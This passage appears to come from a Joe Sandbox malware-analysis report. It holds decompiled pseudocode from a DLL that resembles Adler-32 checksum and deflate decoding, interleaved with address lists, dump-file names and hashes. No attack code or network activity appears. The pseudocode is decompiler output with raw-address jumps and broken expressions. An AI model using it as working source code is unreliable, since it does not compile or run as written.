				_t418 =  *(_t814 + 0xc0 + _t687 * 4);
				 *(_t814 + 0xc0 + _t687 * 4) = _t418;
				_t221 = _t687 + 1; // 0x1
				_t715 = _t221;
				_t688 = _t715;
				if (_t715 != 4) goto 0xf3060e77;
				 *((intOrPtr*)(_t814 + 0xa0 + _t688 * 4)) =  *((intOrPtr*)(_t814 + 0xa0 + _t688 * 4)) - _t418 * 0xfff1;
				_t228 = _t688 + 1; // 0x1
				if (_t228 != 4) goto 0xf3060ea7;
				_t692 = _t812 * _t734 >> 0x2f;
				_t640 = 0x3f51f08900 - __r12;
				if (_t640 >= 0) goto 0xf3060de2;
				_t873 =  *(_t814 + 0x108);
				r14d = r14d & 0x00000003;
				_t830 =  *((intOrPtr*)(_t814 + 0x58));
				r10d =  *(_t814 + 0x1b8);
				_t797 =  *(_t814 + 0xe8);
				r12d =  *(_t814 + 0x7c);
				if (_t640 == 0) goto 0xf3060fc8;
				_t835 = 0x3f51f0dfc0 + _t797;
				 *(_t814 + 0x80) =  *_t835 & 0x000000ff;
				 *(_t814 + 0x84) = _t835[1] & 0x000000ff;
				 *(_t814 + 0x88) = _t835[2] & 0x000000ff;
				 *(_t814 + 0x8c) = _t835[3] & 0x000000ff;
				 *((intOrPtr*)(_t814 + 0xc0 + _t692 * 4)) =  *((intOrPtr*)(_t814 + 0xc0 + _t692 * 4)) +  *((intOrPtr*)(_t814 + 0x80 + _t692 * 4));
				_t252 = _t692 + 1; // 0x1
				_t765 = _t252;
				_t693 = _t765;
				if (_t765 != 4) goto 0xf3060f72;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				_t498 =  *(_t814 + 0x80 + _t693 * 4);
				 *((intOrPtr*)(_t814 + 0xa0 + _t693 * 4)) =  *((intOrPtr*)(_t814 + 0xa0 + _t693 * 4)) + _t498;
				_t262 = _t693 + 1; // 0x1
				_t766 = _t262;
				_t694 = _t766;
				_t642 = _t766 - 4;
				if (_t642 != 0) goto 0xf3060f9f;
				if (_t642 != 0) goto 0xf3060f41;
				_t499 = _t498 * 0xfff1;
				 *((intOrPtr*)(_t814 + 0xc0 + _t694 * 4)) =  *((intOrPtr*)(_t814 + 0xc0 + _t694 * 4)) - _t499;
				_t270 = _t694 + 1; // 0x1
				_t770 = _t270;
				_t695 = _t770;
				if (_t770 != 4) goto 0xf3060fd7;
				r9d =  *(_t814 + 0x6c);
				 *((intOrPtr*)(_t814 + 0xa0 + _t695 * 4)) =  *((intOrPtr*)(_t814 + 0xa0 + _t695 * 4)) - _t499 * 0xfff1;
				_t279 = _t695 + 1; // 0x1
				_t774 = _t279;
				_t696 = _t774;
				if (_t774 != 4) goto 0xf3061019;
				 *(_t814 + 0xa0 + _t696 * 4) =  *(_t814 + 0xa0 + _t696 * 4) << 2;
				_t697 = _t696 + 1;
				if (_t697 != 4) goto 0xf3061051;
				 *((intOrPtr*)(_t814 + 0xa4)) =  *((intOrPtr*)(_t814 + 0xa4)) -  *((intOrPtr*)(_t814 + 0xc4)) + 0xfff1;
				 *((intOrPtr*)(_t814 + 0xa8)) =  ~( *((intOrPtr*)(_t814 + 0xc8)) +  *((intOrPtr*)(_t814 + 0xc8))) +  *((intOrPtr*)(_t814 + 0xa8)) + 0x1ffe2;
				 *((intOrPtr*)(_t814 + 0xac)) =  *((intOrPtr*)(_t814 + 0xac)) + _t774 + _t774 * 2;
				_t698 = _t697 + 1;
				if (_t698 != 4) goto 0xf30610b4;
				r12d = r12d *  *(_t814 + 0x50);
				_t700 = _t698 * _t812 >> 0x2f;
				_t701 = _t700 + 1;
				if (_t701 != 4) goto 0xf30610e4;
				if (_t873 == 0) goto 0xf306110b;
				_t480 = r12d +  *((intOrPtr*)(_t814 + 0xc0 + _t697 * 4)) + ( *(_t797 +  *(_t814 + 0x100) + _t701) & 0x000000ff);
				_t561 = (_t379 >> 0x10) + r11d + r12d - 0x800000007961 +  *((intOrPtr*)(_t814 + 0xa0 + _t700 * 4)) + _t480;
				if (_t873 != _t701 + 1) goto 0xf30610fb;
				_t408 = _t561 * 0xfff1;
				_t564 = _t561 - _t408 << 0x00000010 | _t480 - _t480 * 0x0000fff1;
				 *(_t830 + 0x20) = _t564;
				_t650 = r9b;
				if (_t650 != 0) goto 0xf30611a7;
				r10d = r10d & 0x00000001;
				if (_t650 == 0) goto 0xf306117f;
				r9b = _t564 ==  *((intOrPtr*)(_t830 + 0x14));
				r9b = r9b + r9b;
				r9b = r9b + 0xfe;
				goto 0xf306117f;
				_t708 =  *((intOrPtr*)(_t814 + 0x110));
				 *(_t708 + 8) = r9b;
				 *_t708 =  *((intOrPtr*)(_t814 + 0xe0)) -  *(_t814 + 0xb8) + __r15 +  *(_t814 + 0xd8);
				 *((long long*)(_t708 + 0x10)) = _t830 - _t812;
				return _t408;
			}

0x7fef30603c7
0x7fef30603cb
0x7fef30603d2
0x7fef30603d8
0x7fef30603de
0x7fef30603eb
0x7fef30603f0
0x7fef30603fc
0x7fef30603ff
0x7fef3060407
0x7fef306040b
0x7fef3060411
0x7fef3060416
0x7fef306041d
0x7fef306041f
0x7fef3060424
0x7fef3060434
0x7fef3060439
0x7fef306043d
0x7fef3060445
0x7fef306044d
0x7fef3060453
0x7fef3060455
0x7fef306045b
0x7fef306045f
0x7fef3060462
0x7fef3060467
0x7fef306046d
0x7fef306047a
0x7fef3060480
0x7fef3060485
0x7fef306048b
0x7fef3060491
0x7fef30604a4
0x7fef30604a6
0x7fef30604a9
0x7fef30604ae
0x7fef30604b2
0x7fef30604b6
0x7fef30604b9
0x7fef30604d1
0x7fef30604d6
0x7fef30604da
0x7fef30604de
0x7fef30604e1
0x7fef30604f8
0x7fef30604fd
0x7fef3060506
0x7fef306050e
0x7fef3060516
0x7fef3060522
0x7fef3060526
0x7fef306052c
0x7fef3060541
0x7fef3060552
0x7fef3060560
0x7fef306056c
0x7fef3060574
0x7fef306057b
0x7fef306057f
0x7fef3060582
0x7fef3060587
0x7fef3060599
0x7fef306059d
0x7fef30605a3
0x7fef30605a9
0x7fef30605af
0x7fef30605bf
0x7fef30605c5
0x7fef30605c9
0x7fef30605ce
0x7fef30605d4
0x7fef30605de
0x7fef30605eb
0x7fef30605f0
0x7fef30605f8
0x7fef3060600
0x7fef3060605
0x7fef3060608
0x7fef3060615
0x7fef306061f
0x7fef3060624
0x7fef306062f
0x7fef3060638
0x7fef3060640
0x7fef306064b
0x7fef306064d
0x7fef3060652
0x7fef3060654
0x7fef306065c
0x7fef3060668
0x7fef306066c
0x7fef3060674
0x7fef306067a
0x7fef3060685
0x7fef306068e
0x7fef3060693
0x7fef306069c
0x7fef30606a9
0x7fef30606af
0x7fef30606b7
0x7fef30606bb
0x7fef30606c0
0x7fef30606c6
0x7fef30606cb
0x7fef30606d0
0x7fef30606d4
0x7fef30606e1
0x7fef30606ea
0x7fef30606f6
0x7fef3060702
0x7fef3060713
0x7fef306071a
0x7fef306071e
0x7fef3060721
0x7fef3060726
0x7fef306072e
0x7fef3060731
0x7fef3060736
0x7fef3060739
0x7fef306073e
0x7fef3060741
0x7fef306074b
0x7fef3060755
0x7fef306075d
0x7fef3060765
0x7fef306076d
0x7fef3060770
0x7fef3060777
0x7fef3060780
0x7fef3060787
0x7fef306078a
0x7fef306079b
0x7fef30607a3
0x7fef30607ad
0x7fef30607ba
0x7fef30607c3
0x7fef30607c7
0x7fef30607d0
0x7fef30607e1
0x7fef30607e3
0x7fef30607ef
0x7fef30607f3
0x7fef3060800
0x7fef3060808
0x7fef3060813
0x7fef306081e
0x7fef3060827
0x7fef306082b
0x7fef3060833
0x7fef3060839
0x7fef3060846
0x7fef3060848
0x7fef306084e
0x7fef3060856
0x7fef306085c
0x7fef306085e
0x7fef3060862
0x7fef3060866
0x7fef306086a
0x7fef306086c
0x7fef3060877
0x7fef306087d
0x7fef3060892
0x7fef306089e
0x7fef30608a3
0x7fef30608aa
0x7fef30608b4
0x7fef30608bf
0x7fef30608c8
0x7fef30608d4
0x7fef30608e2
0x7fef30608fc
0x7fef306090e
0x7fef3060932
0x7fef306093d
0x7fef3060948
0x7fef3060953
0x7fef306095c
0x7fef3060960
0x7fef3060968
0x7fef306096e
0x7fef306097b
0x7fef3060988
0x7fef306098d
0x7fef306099a
0x7fef30609aa
0x7fef30609b1
0x7fef30609b9
0x7fef30609be
0x7fef30609ca
0x7fef30609f3
0x7fef30609f6
0x7fef30609fd
0x7fef3060a01
0x7fef3060a09
0x7fef3060a13
0x7fef3060a19
0x7fef3060a20
0x7fef3060a30
0x7fef3060a35
0x7fef3060a3a
0x7fef3060a3d
0x7fef3060a48
0x7fef3060a83
0x7fef3060a89
0x7fef3060a8e
0x7fef3060a95
0x7fef3060a9a
0x7fef3060aa2
0x7fef3060aa7
0x7fef3060aac
0x7fef3060aaf
0x7fef3060abc
0x7fef3060ac1
0x7fef3060ac7
0x7fef3060ad0
0x7fef3060ad5
0x7fef3060ade
0x7fef3060ae6
0x7fef3060aea
0x7fef3060af6
0x7fef3060afe
0x7fef3060b0b
0x7fef3060b14
0x7fef3060b18
0x7fef3060b21
0x7fef3060b27
0x7fef3060b34
0x7fef3060b39
0x7fef3060b3e
0x7fef3060b47
0x7fef3060b4e
0x7fef3060b52
0x7fef3060b56
0x7fef3060b59
0x7fef3060b63
0x7fef3060b66
0x7fef3060b6b
0x7fef3060b73
0x7fef3060b77
0x7fef3060b7b
0x7fef3060b80
0x7fef3060b85
0x7fef3060b8b
0x7fef3060b8e
0x7fef3060b92
0x7fef3060b97
0x7fef3060b9f
0x7fef3060ba4
0x7fef3060ba8
0x7fef3060bab
0x7fef3060bae
0x7fef3060bb3
0x7fef3060bb5
0x7fef3060bb9
0x7fef3060bbc
0x7fef3060bbf
0x7fef3060bc1
0x7fef3060bc5
0x7fef3060bc8
0x7fef3060bcb
0x7fef3060bd0
0x7fef3060bd3
0x7fef3060bd8
0x7fef3060bdb
0x7fef3060bde
0x7fef3060be3
0x7fef3060be6
0x7fef3060beb
0x7fef3060bee
0x7fef3060bf1
0x7fef3060bf3
0x7fef3060bf7
0x7fef3060bfa
0x7fef3060bfd
0x7fef3060bff
0x7fef3060c03
0x7fef3060c06
0x7fef3060c09
0x7fef3060c0b
0x7fef3060c0e
0x7fef3060c19
0x7fef3060c1b
0x7fef3060c1f
0x7fef3060c22
0x7fef3060c25
0x7fef3060c27
0x7fef3060c2b
0x7fef3060c2e
0x7fef3060c47
0x7fef3060c49
0x7fef3060c52
0x7fef3060c68
0x7fef3060c73
0x7fef3060c76
0x7fef3060c7f
0x7fef3060c83
0x7fef3060c90
0x7fef3060c98
0x7fef3060c9a
0x7fef3060ca5
0x7fef3060cae
0x7fef3060cb1
0x7fef3060cb6
0x7fef3060cb9
0x7fef3060cbb
0x7fef3060cc0
0x7fef3060cc7
0x7fef3060cdd
0x7fef3060ce5
0x7fef3060ced
0x7fef3060cf5
0x7fef3060cf9
0x7fef3060cfc
0x7fef3060cff
0x7fef3060d0a
0x7fef3060d10
0x7fef3060d13
0x7fef3060d1c
0x7fef3060d1f
0x7fef3060d25
0x7fef3060d2d
0x7fef3060d3d
0x7fef3060d43
0x7fef3060d47
0x7fef3060d4a
0x7fef3060d52
0x7fef3060d55
0x7fef3060d5d
0x7fef3060d68
0x7fef3060d80
0x7fef3060d88
0x7fef3060d9d
0x7fef3060da0
0x7fef3060da5
0x7fef3060dae
0x7fef3060db6
0x7fef3060dbe
0x7fef3060dc2
0x7fef3060dca
0x7fef3060dd3
0x7fef3060de7
0x7fef3060dfe
0x7fef3060e05
0x7fef3060e0c
0x7fef3060e13
0x7fef3060e1a
0x7fef3060e25
0x7fef3060e2d
0x7fef3060e38
0x7fef3060e3a
0x7fef3060e42
0x7fef3060e53
0x7fef3060e5a
0x7fef3060e61
0x7fef3060e65
0x7fef3060e6b
0x7fef3060e6f
0x7fef3060e8f
0x7fef3060e91
0x7fef3060e98
0x7fef3060e98
0x7fef3060e9c
0x7fef3060ea3
0x7fef3060ec1
0x7fef3060ec8
0x7fef3060ed3
0x7fef3060ee9
0x7fef3060ef5
0x7fef3060ef8
0x7fef3060efe
0x7fef3060f06
0x7fef3060f1e
0x7fef3060f23
0x7fef3060f2b
0x7fef3060f33
0x7fef3060f38
0x7fef3060f3e
0x7fef3060f54
0x7fef3060f5b
0x7fef3060f62
0x7fef3060f69
0x7fef3060f79
0x7fef3060f80
0x7fef3060f80
0x7fef3060f84
0x7fef3060f8b
0x7fef3060f8d
0x7fef3060f95
0x7fef3060f9f
0x7fef3060fa6
0x7fef3060fad
0x7fef3060fad
0x7fef3060fb1
0x7fef3060fb4
0x7fef3060fb8
0x7fef3060fc2
0x7fef3060fe9
0x7fef3060ff1
0x7fef3060ff8
0x7fef3060ff8
0x7fef3060ffc
0x7fef3061003
0x7fef306100c
0x7fef3061033
0x7fef306103a
0x7fef306103a
0x7fef306103e
0x7fef3061045
0x7fef3061051
0x7fef3061059
0x7fef3061060
0x7fef306107e
0x7fef3061097
0x7fef30610a8
0x7fef30610bb
0x7fef30610c2
0x7fef30610c4
0x7fef30610d6
0x7fef30610eb
0x7fef30610f2
0x7fef30610f7
0x7fef30610ff
0x7fef3061101
0x7fef3061109
0x7fef306112c
0x7fef3061137
0x7fef3061139
0x7fef306113d
0x7fef3061140
0x7fef3061142
0x7fef3061156
0x7fef306115c
0x7fef3061160
0x7fef3061163
0x7fef3061167
0x7fef3061177
0x7fef3061188
0x7fef306118c
0x7fef306118f
0x7fef30611a6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6718b6092973c69614d264dd1962f974493918d1e9ce6f4bda5bfa1792530d0f
Instruction ID: 513c9fa380bb115a30f4a6b05d8674b8aa1f68dea41ece7b450709c76f2e4097
Opcode Fuzzy Hash: 6718b6092973c69614d264dd1962f974493918d1e9ce6f4bda5bfa1792530d0f
Instruction Fuzzy Hash: 44F10472B0C3D58BE7A48F19E4407AAB7E2F784794F148236DA9947BE8D63DD440EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305F8EA Relevance: .4, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF305F8EA(unsigned long long _a48, signed char _a56, intOrPtr _a80, void* _a304) {
				unsigned int _t15;
				signed char _t19;
				signed char _t20;
				unsigned long long _t31;
				signed long long _t40;
				void* _t43;
				void* _t44;
				void* _t46;

				_t19 = _a56;
				if (_t19 - 3 >= 0) goto 0xf305f93d;
				if (_t44 == _t46) goto 0xf305f92c;
				_t31 = _a48 | _t40 << _t19;
				_a48 = _t31;
				_t20 = _t19 + 8;
				_a56 = _t20;
				r12d = 0;
				goto 0xf305f932;
				r12d = _a80;
				if ((r12b & 0x00000002) == 0) goto 0xf305f902;
				goto 0xf305fa58;
				_a48 = _t31 >> 3;
				_a56 = _t20 + 0xfffffffd;
				 *(_t43 + 0x18) = _t15 & 0x00000001;
				 *(_t43 + 0x1c) = _t15 >> 0x00000001 & 0x00000003;
				goto __rax;
			}

0x7fef305f8f6
0x7fef305f905
0x7fef305f90a
0x7fef305f915
0x7fef305f918
0x7fef305f91d
0x7fef305f920
0x7fef305f924
0x7fef305f92a
0x7fef305f92f
0x7fef305f936
0x7fef305f938
0x7fef305f944
0x7fef305f94c
0x7fef305f955
0x7fef305f95e
0x7fef305f979

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32762110b81a4feda46413a6872519845026050dc40b5e4461c32aded439206a
Instruction ID: 87d4cd977d1e46233b7968bf6934bd8a2ca503d79abc892eb04f58fdb2da6241
Opcode Fuzzy Hash: 32762110b81a4feda46413a6872519845026050dc40b5e4461c32aded439206a
Instruction Fuzzy Hash: 1CE1F672B0C3C58BD7A48F29E4407AAB7E2F788794F148236DA9957BD8D63DD441EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305F97B Relevance: .4, Instructions: 356
COMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E000007FE7FEF305F97B(signed int __esi, void* __r8, signed long long __r9, void* __r10, void* __r12, signed long long __r13, void* __r14, signed int __r15) {
				signed char _t514;
				signed int _t516;
				signed int _t518;
				signed int _t521;
				signed int _t526;
				signed int _t530;
				signed char _t531;
				signed char _t532;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed char _t537;
				signed char _t544;
				signed int _t552;
				signed int _t555;
				signed int _t558;
				unsigned int _t563;
				signed int _t564;
				short _t566;
				signed int _t580;
				signed short _t582;
				signed int _t583;
				signed int _t585;
				signed int _t593;
				signed short _t595;
				signed char _t604;
				signed int _t610;
				signed int _t613;
				unsigned int _t617;
				signed int _t646;
				signed int _t647;
				signed char _t648;
				signed int _t652;
				signed char _t653;
				signed int _t662;
				signed short _t669;
				signed char _t672;
				char _t674;
				signed char _t677;
				signed char _t681;
				signed char _t682;
				signed char _t685;
				unsigned int _t704;
				signed int _t705;
				short _t707;
				signed char _t722;
				signed char _t724;
				signed int _t728;
				signed int _t729;
				signed char _t731;
				signed char _t737;
				signed int _t741;
				signed char _t745;
				signed int _t748;
				signed char _t767;
				unsigned int _t774;
				signed char _t776;
				signed int _t786;
				signed int _t802;
				signed int _t815;
				signed int _t816;
				signed int _t822;
				signed int _t828;
				signed short _t830;
				signed int _t832;
				signed short _t835;
				signed int _t840;
				signed int _t841;
				signed short _t844;
				void* _t848;
				signed int _t851;
				signed int _t854;
				signed int _t857;
				signed int _t864;
				signed int _t867;
				signed int _t870;
				signed char _t872;
				signed int _t879;
				signed int _t895;
				signed int _t897;
				signed int _t921;
				signed int _t924;
				void* _t936;
				void* _t939;
				void* _t942;
				void* _t953;
				signed short _t964;
				void* _t969;
				void* _t972;
				void* _t995;
				signed int _t1005;
				void* _t1007;
				void* _t1036;
				short _t1044;
				void* _t1049;
				signed int _t1077;
				signed int _t1078;
				void* _t1082;
				void* _t1085;
				void* _t1087;
				signed int _t1095;
				intOrPtr _t1102;
				void* _t1107;
				signed long long _t1110;
				signed long long _t1114;
				signed long long _t1115;
				signed long long _t1121;
				signed long long _t1122;
				long long _t1138;
				signed int _t1147;
				signed long long _t1148;
				signed long long _t1149;
				signed long long _t1153;
				signed long long _t1154;
				signed long long _t1155;
				signed long long _t1156;
				signed long long _t1157;
				signed long long _t1158;
				signed long long _t1159;
				signed long long _t1161;
				void* _t1162;
				long long* _t1169;
				unsigned long long _t1171;
				signed long long _t1173;
				unsigned long long _t1176;
				unsigned long long _t1180;
				void* _t1184;
				long long _t1185;
				signed long long _t1187;
				signed long long _t1191;
				signed long long _t1192;
				intOrPtr _t1203;
				signed long long _t1208;
				signed long long _t1212;
				intOrPtr _t1220;
				void* _t1222;
				long long _t1225;
				signed long long _t1226;
				intOrPtr _t1227;
				signed long long _t1229;
				signed long long _t1233;
				signed long long _t1234;
				signed char* _t1242;
				signed long long _t1245;
				unsigned long long _t1249;
				signed long long _t1253;
				unsigned long long _t1254;
				signed long long _t1262;
				unsigned long long _t1265;
				unsigned long long _t1266;
				intOrPtr _t1275;
				signed long long _t1280;
				unsigned long long _t1282;
				signed long long _t1289;
				signed long long _t1290;
				signed long long _t1294;
				signed long long _t1298;
				signed long long _t1302;
				intOrPtr _t1303;
				void* _t1305;
				signed long long _t1314;
				void* _t1318;
				void* _t1320;
				signed long long _t1323;
				long long _t1324;
				void* _t1325;
				signed long long _t1328;
				signed char* _t1333;
				signed char* _t1340;
				signed char* _t1345;
				signed long long _t1348;
				signed long long _t1349;
				signed long long _t1350;
				signed long long _t1352;
				void* _t1357;
				signed long long _t1368;
				void* _t1370;
				void* _t1373;
				signed long long _t1376;
				signed long long _t1377;
				void* _t1378;
				void* _t1379;
				long long _t1380;
				void* _t1384;
				signed long long _t1387;
				void* _t1389;
				intOrPtr _t1396;
				intOrPtr _t1399;
				signed long long _t1401;
				long long _t1402;
				signed char* _t1405;
				intOrPtr _t1408;
				intOrPtr _t1409;
				intOrPtr _t1410;
				intOrPtr _t1411;
				intOrPtr _t1412;
				intOrPtr _t1413;
				intOrPtr _t1415;
				signed long long _t1416;
				intOrPtr _t1420;
				long long _t1423;
				signed char* _t1426;
				signed long long _t1434;
				signed char* _t1437;
				intOrPtr* _t1441;
				signed char* _t1445;
				signed char* _t1446;
				signed char* _t1447;
				signed char* _t1448;
				signed char* _t1449;
				void* _t1453;
				void* _t1456;
				void* _t1457;
				void* _t1461;
				void* _t1462;
				signed int* _t1463;
				signed long long _t1469;

				_t1401 = __r9;
				_t854 = __esi;
				 *((long long*)(__r10 + 0x30)) = 0x120;
				_t1318 = __r8;
				r8d = 0x90;
				E000007FE7FEF30F24C0();
				asm("movaps xmm0, [0xa2878]");
				asm("movups [edi], xmm0");
				asm("movups [edi+0x10], xmm0");
				asm("movups [edi+0x20], xmm0");
				asm("movups [edi+0x30], xmm0");
				asm("movups [edi+0x40], xmm0");
				asm("movups [edi+0x50], xmm0");
				asm("movups [edi+0x60], xmm0");
				asm("movaps xmm0, [0xa2866]");
				asm("movups [ecx], xmm0");
				 *((long long*)( *(_t1370 + 0x108) + 0x10)) = 0x7070707;
				 *((long long*)( *((intOrPtr*)(_t1370 + 0x58)) + 0xdd4)) = 0x8080808;
				asm("movaps xmm0, [0xa2840]");
				asm("movups [eax+0x10], xmm0");
				asm("movups [eax], xmm0");
				_t1233 = _t1370 + 0x30;
				_t1203 =  *((intOrPtr*)(_t1370 + 0x58));
				_t514 = E000007FE7FEF3061920( *(_t1370 + 0xf8), _t1203, _t1233, __r8, __r10);
				_t647 =  *(_t1370 + 0x50);
				_t1373 = _t1318;
				_t1408 =  *((intOrPtr*)(_t1370 + 0x58));
				_t669 = _t514 & 0x000000ff;
				 *(_t1370 + 0x40) = 0;
				r12d = _t669 & 0x0000ffff;
				r12d = r12d | 0x00001900;
				if (r12b == 0) goto 0xf305f8f6;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				_t516 =  *(_t1370 + 0x38);
				 *(_t1370 + 0x30) =  *(_t1370 + 0x30) >> (_t516 & 0x00000007);
				 *(_t1370 + 0x38) = _t516 & 0xfffffff8;
				 *(_t1370 + 0x40) = 0;
				r12b = 5;
				_t518 =  *(_t1370 + 0x40);
				_t822 =  *(_t1370 + 0x50);
				if (_t518 - 4 >= 0) goto 0xf3060587;
				_t672 =  *(_t1370 + 0x38);
				if (_t672 == 0) goto 0xf305faf2;
				if (_t672 - 8 >= 0) goto 0xf305fb09;
				if (__r14 == __r15) goto 0xf305fae4;
				_t1234 = _t1233 << _t672;
				_t1171 =  *(_t1370 + 0x30) | _t1234;
				 *(_t1370 + 0x30) = _t1171;
				 *(_t1370 + 0x38) = _t672 + 8;
				r12d = 0;
				_t1441 = __r14 + 1;
				goto 0xf305faea;
				r12d = _t822;
				if ((r12b & 0x00000002) == 0) goto 0xf305fab9;
				goto 0xf305fb37;
				if (_t1441 == __r15) goto 0xf305fb31;
				_t674 =  *_t1441;
				 *((char*)(_t1408 + _t1234 + 0x291d)) = _t674;
				goto 0xf305fb26;
				 *(_t1370 + 0x30) = _t1171 >> 8;
				 *(_t1370 + 0x38) = _t674 + 0xfffffff8;
				 *(_t1408 + _t1203 + 0x291d) = _t647;
				 *(_t1370 + 0x40) = _t518 + 1;
				r12d = 0;
				goto 0xf305fb37;
				r12d = _t822;
				if (r12b == 0) goto 0xf305faa0;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				r12b = 0x14;
				if ( *(_t1370 + 0x40) == 0) goto 0xf305f43b;
				r12b = 7;
				_t936 = _t1373 -  *((intOrPtr*)(_t1370 + 0x1a8));
				if (_t936 != 0) goto 0xf305f43b;
				_t1320 = __r15 - __r15;
				if (_t936 == 0) goto 0xf30611fa;
				_t1102 =  *((intOrPtr*)(_t1370 + 0x1a8));
				_t1301 =  >=  ? _t1320 : _t1102 - _t1373;
				_t1302 =  >=  ? __r15 :  >=  ? _t1320 : _t1102 - _t1373;
				_t939 = _t1302 - _t1320;
				if (_t939 > 0) goto 0xf3061395;
				_t1173 = _t1302 + _t1373;
				if (_t939 < 0) goto 0xf30613a4;
				if (_t1173 - _t1102 > 0) goto 0xf30613b3;
				E000007FE7FEF30F1E10();
				_t1445 =  <=  ? __r15 : __r15 + _t1302;
				_t879 =  *(_t1370 + 0x40) - _t822;
				 *(_t1370 + 0x40) = _t879;
				r12b = 6;
				_t1376 = _t1173;
				_t1409 =  *((intOrPtr*)(_t1370 + 0x58));
				 *(_t1370 + 0x70) = _t1376;
				_t677 =  *(_t1370 + 0x38);
				r8d =  *(_t1370 + 0x40);
				_t942 = r8d - 3;
				if (_t942 >= 0) goto 0xf30605ce;
				 *(_t1370 + 0x80) = 0x5;
				 *(_t1370 + 0x88) = 4;
				r9d = r8d;
				_t521 =  *(_t1370 + 0x80 + _t1401 * 4);
				_t1340 = _t1445;
				if (_t942 >= 0) goto 0xf305fc89;
				if (_t1340 == __r15) goto 0xf305fc7b;
				_t648 =  *_t1340 & 0x000000ff;
				_t1176 =  *(_t1370 + 0x30) << _t677 |  *(_t1370 + 0x30);
				 *(_t1370 + 0x30) = _t1176;
				 *(_t1370 + 0x38) = _t677 + 8;
				r12d = 0;
				_t1446 =  &(_t1340[1]);
				goto 0xf305fc81;
				r12d =  *(_t1370 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305fc4c;
				goto 0xf305fcc8;
				 *(_t1370 + 0x30) = _t1176 >> _t521;
				 *(_t1370 + 0x38) = _t677 - _t521;
				 *((intOrPtr*)(_t1409 + 0x30 + _t1401 * 4)) = ( *(0xf311f0f8 + _t1401 * 2) & 0x0000ffff) + (_t854 &  !_t879);
				r8d = r8d + 1;
				 *(_t1370 + 0x40) = r8d;
				r12d = 0;
				if (r12b == 0) goto 0xf305fc10;
				r12d = r12d >> 8;
				if ((r12b & 0xffffffff) == 1) goto 0xf30605fb;
				if ( *(_t1370 + 0x40) -  *(_t1409 + 0x38) >= 0) goto 0xf305fd3a;
				_t681 =  *(_t1370 + 0x38);
				_t1345 = _t1446;
				if (_t681 - 3 >= 0) goto 0xf305fd6b;
				if (_t1345 == __r15) goto 0xf305fd2c;
				_t1180 =  *(_t1370 + 0x30) | __r15 << _t681;
				 *(_t1370 + 0x30) = _t1180;
				_t682 = _t681 + 8;
				 *(_t1370 + 0x38) = _t682;
				r12d = 0;
				_t1447 =  &(_t1345[1]);
				goto 0xf305fd32;
				r12d =  *(_t1370 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305fd01;
				goto 0xf305fda6;
				 *(_t1409 + 0x38) = 0x13;
				_t1323 = _t1376;
				_t526 = E000007FE7FEF3061920(0xf311f0f8, _t1409, _t1370 + 0x30, _t1376, _t1409);
				_t1377 = _t1323;
				_t1420 =  *((intOrPtr*)(_t1370 + 0x1a0));
				_t1410 =  *((intOrPtr*)(_t1370 + 0x58));
				r12d = _t526;
				goto 0xf305fda6;
				 *(_t1370 + 0x30) = _t1180 >> 3;
				 *(_t1370 + 0x38) = _t682 + 0xfffffffd;
				if (_t526 - 0x13 >= 0) goto 0xf30612c6;
				 *(_t1410 + 0x7fef31212c4) = _t648 & 0x00000007;
				 *(_t1370 + 0x40) = _t526 + 1;
				r12d = 0;
				if (r12b == 0) goto 0xf305fceb;
				_t953 = (r12b & 0xffffffff) - 1;
				if (_t953 == 0) goto 0xf30606d0;
				_t685 =  *(_t1370 + 0x38);
				_t1242 = _t1447;
				if (_t953 >= 0) goto 0xf30604e6;
				if (_t1242 == __r15) goto 0xf305fe03;
				_t1348 = __r15 << _t685;
				 *(_t1370 + 0x30) =  *(_t1370 + 0x30) | _t1348;
				 *(_t1370 + 0x38) = _t685 + 8;
				_t1448 =  &(_t1242[1]);
				goto 0xf305fe08;
				if ((bpl & 0x00000002) == 0) goto 0xf305fdd5;
				_t1245 =  *((intOrPtr*)(_t1370 + 0x1a8));
				_t1208 = __r15 - _t1448;
				if (_t1208 - 4 < 0) goto 0xf306060d;
				_t1107 = _t1245 - _t1377;
				if (_t1107 - 2 < 0) goto 0xf306060d;
				if (_t1107 - 0x103 < 0) goto 0xf305fe4d;
				if (_t1208 - 0xd > 0) goto 0xf3060750;
				_t530 =  *(_t1370 + 0x38);
				if (_t1107 - 0x1e >= 0) goto 0xf305fe76;
				_t1449 =  &(_t1448[4]);
